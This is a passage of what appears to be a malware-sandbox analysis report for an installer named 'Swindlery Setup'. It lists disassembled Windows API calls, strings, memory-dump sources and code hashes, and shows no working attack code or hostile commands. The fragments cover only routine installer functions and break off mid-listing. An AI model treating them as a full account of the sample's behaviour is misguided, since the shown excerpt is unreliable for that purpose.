                          • lstrlenA.KERNEL32(?), ref: 00404587
                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                          • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                          • SendMessageA.USER32(00000000), ref: 00404610
                          • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                          • SetCursor.USER32(00000000), ref: 00404693
                          • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                          • SetCursor.USER32(00000000), ref: 004046AC
                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                          • String ID: N$Remove folder: $cD@
                          • API String ID: 3103080414-2623635553
                          • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                          • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                          • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                          • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,Swindlery Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$Swindlery Setup
                          • API String ID: 941294808-656777584
                          • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                          • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                          • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                          • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                          • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                            • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                            • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                          • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                          • wsprintfA.USER32 ref: 00405F6B
                          • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                          • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                          • GlobalFree.KERNEL32(00000000), ref: 00406054
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                            • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                            • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %s=%s$[Rename]
                          • API String ID: 2171350718-1727408572
                          • Opcode ID: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                          • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                          • Opcode Fuzzy Hash: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                          • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                          APIs
                          • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                          • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                          • CharNextA.USER32(0000000C,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                          • CharPrevA.USER32(0000000C,0000000C,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                          Strings
                          • *?|<>/":, xrefs: 004065CF
                          • "C:\Users\user\Desktop\vfhlZ0vrbe.exe", xrefs: 00406587
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-2212154593
                          • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                          • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                          • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                          • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                          APIs
                          • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                          • GetSysColor.USER32(00000000), ref: 004043EF
                          • SetTextColor.GDI32(?,00000000), ref: 004043FB
                          • SetBkMode.GDI32(?,?), ref: 00404407
                          • GetSysColor.USER32(?), ref: 0040441A
                          • SetBkColor.GDI32(?,?), ref: 0040442A
                          • DeleteObject.GDI32(?), ref: 00404444
                          • CreateBrushIndirect.GDI32(?), ref: 0040444E
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                          • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                          • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                          • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                          APIs
                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                          • GetMessagePos.USER32 ref: 00404CA3
                          • ScreenToClient.USER32(?,?), ref: 00404CBD
                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                          • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                          • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                          • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                          APIs
                          • GetDC.USER32(?), ref: 00401E5D
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                          • ReleaseDC.USER32(?,00000000), ref: 00401E90
                          • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID: Times New Roman
                          • API String ID: 3808545654-927190056
                          • Opcode ID: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                          • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                          • Opcode Fuzzy Hash: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                          • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                          • MulDiv.KERNEL32(0014CD37,00000064,0014D888), ref: 00402E90
                          • wsprintfA.USER32 ref: 00402EA0
                          • SetWindowTextA.USER32(?,?), ref: 00402EB0
                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                          Strings
                          • verifying installer: %d%%, xrefs: 00402E9A
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: verifying installer: %d%%
                          • API String ID: 1451636040-82062127
                          • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                          • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                          • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                          • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                          • GlobalFree.KERNEL32(?), ref: 004028C9
                          • GlobalFree.KERNEL32(00000000), ref: 004028DC
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                          Similarity
                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                          • String ID:
                          • API String ID: 2667972263-0
                          • Opcode ID: f9d8bf5d5987790022c70f7326850f96b9b02ebc48a317f88317c3e1387ee75d
                          • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                          • Opcode Fuzzy Hash: f9d8bf5d5987790022c70f7326850f96b9b02ebc48a317f88317c3e1387ee75d
                          • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                          APIs
                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                          • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                          • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                          • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401DA3
                          • GetClientRect.USER32(?,?), ref: 00401DF1
                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                          • DeleteObject.GDI32(00000000), ref: 00401E45
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                          • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                          • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                          • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                          APIs
                          • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404C14
                          • wsprintfA.USER32 ref: 00404C1C
                          • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                          • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                          • Opcode Fuzzy Hash: 17096d46716481697b9a4a6888529ebbe9c3f7ba7e60b1f399950c36a032e1d6
                          • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                          • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3355392842
                          • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                          • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                          • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                          • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                          APIs
                          • CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                          • CharNextA.USER32(00000000), ref: 00405CCB
                          • CharNextA.USER32(00000000), ref: 00405CDF
                          Similarity
                          • API ID: CharNext
                          • String ID: C:\
                          • API String ID: 3213498283-3404278061
                          • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                          • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                          • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                          • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                          APIs
                          • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                          • GetTickCount.KERNEL32 ref: 00402EFE
                          • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                          • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                          • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                          • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                          • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405374
                          • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                            • Part of subcall function 00404379: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 0040438B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                          • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                          • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                          • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                          APIs
                          • FreeLibrary.KERNEL32(?,77193410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                          • GlobalFree.KERNEL32(00000000), ref: 00403A22
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3355392842
                          • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                          • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                          • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                          • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3370423016
                          • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                          • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                          • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                          • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                          • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                          Memory Dump Source
